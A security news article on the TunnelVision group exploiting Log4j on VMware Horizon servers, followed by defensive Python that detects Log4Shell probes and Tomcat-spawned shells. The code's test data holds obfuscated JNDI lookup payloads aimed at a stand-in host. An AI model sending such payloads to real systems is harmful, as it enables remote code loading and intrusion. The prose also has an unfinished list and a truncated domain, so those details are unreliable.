
TunnelVision, an Iranian-affiliated hacker group, was detected attacking Log4j on VMware Horizon servers to compromise corporate networks in the Middle East and the United States. The cyber security experts who have been monitoring the activity picked the moniker because of the group’s heavy use of tunnelling tools, which let it conceal its operations from detection. Tunnelling is the process of obfuscating or even concealing data flow during its transmission. TunnelVision’s goal appears to be the distribution of ransomware, indicating that the gang is interested not only in cyber espionage but also in data destruction and operational disruption.

TunnelVision initially targeted CVE-2018-13379 (Fortinet FortiOS) and a series of Microsoft Exchange ProxyShell vulnerabilities, and has recently shifted its focus to Log4Shell. The targeted deployments are VMware Horizon servers that are vulnerable to Log4j flaws which are trivial to exploit. The exploit procedure is identical to that described by the NHS in a January 2022 security bulletin: it entails the direct execution of PowerShell commands and the launching of reverse shells via the Tomcat service. While the PowerShell commands help the adversaries collect command output via a webhook, all connections make use of one of the following authorized services: The researchers saw TunnelVision deploy two custom reverse shell backdoors onto compromised machines.

The first payload is a zip file containing an executable called “InteropServices.exe”; this executable contains an obfuscated reverse shell beaconing to “microsoft-updateservercf.” The second payload, which the threat actors have primarily employed in recent attempts, is a modified version of a one-line PowerShell script published on GitHub.
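The exploitation chain described above (a Log4Shell lookup reaching the Horizon web tier, followed by the Tomcat service launching PowerShell) leaves two telemetry traces a defender can check for. The following Python is an added example written for this page, not code from the article or from the researchers it cites. It assumes Tomcat-style combined access logs and a simple (parent image, child image, command line) shape for endpoint process events; every log line and process event below is constructed, and the parent process name `ws_TomcatService.exe` is assumed to be the Horizon Tomcat service binary.

```python
"""Detection helpers for Log4Shell probes and Tomcat-spawned shells.

Added illustration, not part of the original article. Sample data is constructed.
"""
import re
from typing import List, Tuple

# ${...:-X} default-value lookups (e.g. ${::-j}) resolve to X.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# ${lower:X} / ${upper:X} lookups resolve to X (case does not matter for matching).
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# A resolved JNDI lookup, capturing the protocol (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalise_lookups(text: str) -> str:
    """Collapse nested Log4j lookups so that obfuscated payloads such as
    ${${lower:j}ndi:...} or ${${::-j}${::-n}di:...} read as ${jndi:...}.
    Innermost lookups are resolved first; the loop repeats until stable."""
    prev = None
    while prev != text:
        prev = text
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        text = CASE_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def jndi_protocols(line: str) -> List[str]:
    """Return the protocol of every JNDI lookup present in one log line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalise_lookups(line))]


def scan_access_log(lines) -> List[Tuple[int, str]]:
    """Return (line number, protocol) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for proto in jndi_protocols(line):
            hits.append((number, proto))
    return hits


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def tomcat_spawned_shells(events) -> List[Tuple[str, str]]:
    """Flag process events in which a Tomcat process starts a command shell,
    the parent/child pattern a web shell or reverse shell on Horizon produces.
    Each event is (parent_image, child_image, command_line)."""
    return [
        (parent, child)
        for parent, child, _cmdline in events
        if "tomcat" in parent.lower() and child.lower() in SHELLS
    ]


# Constructed Tomcat access-log lines: one benign, three carrying lookups in
# the User-Agent field with increasing levels of obfuscation.
ACCESS_LOG = [
    '10.0.0.5 - - [15/Feb/2022:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Feb/2022:10:02:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Feb/2022:10:02:41 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b}"',
    '10.0.0.9 - - [15/Feb/2022:10:03:10 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/c}"',
]

# Constructed process events (parent, child, command line); only the second
# one matches the Tomcat-to-shell pattern.
PROCESS_EVENTS = [
    ("services.exe", "ws_TomcatService.exe", "ws_TomcatService.exe"),
    ("ws_TomcatService.exe", "powershell.exe", "powershell.exe <constructed arguments>"),
    ("explorer.exe", "powershell.exe", "powershell.exe"),
]

if __name__ == "__main__":
    for number, proto in scan_access_log(ACCESS_LOG):
        print(f"access log line {number}: JNDI lookup over {proto}")
    for parent, child in tomcat_spawned_shells(PROCESS_EVENTS):
        print(f"process event: {parent} spawned {child}")
```

The normalisation step matters because a plain `${jndi:` substring match misses the nested-lookup variants that scanners started seeing within days of the Log4Shell disclosure; resolving `${lower:...}` and `${...:-x}` first makes the three constructed probes collapse to the same `${jndi:<protocol>:` form. The process check is deliberately coarse (any Tomcat parent, any shell child) because on a Horizon server that pairing should essentially never be legitimate, so a low false-positive rate is expected.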

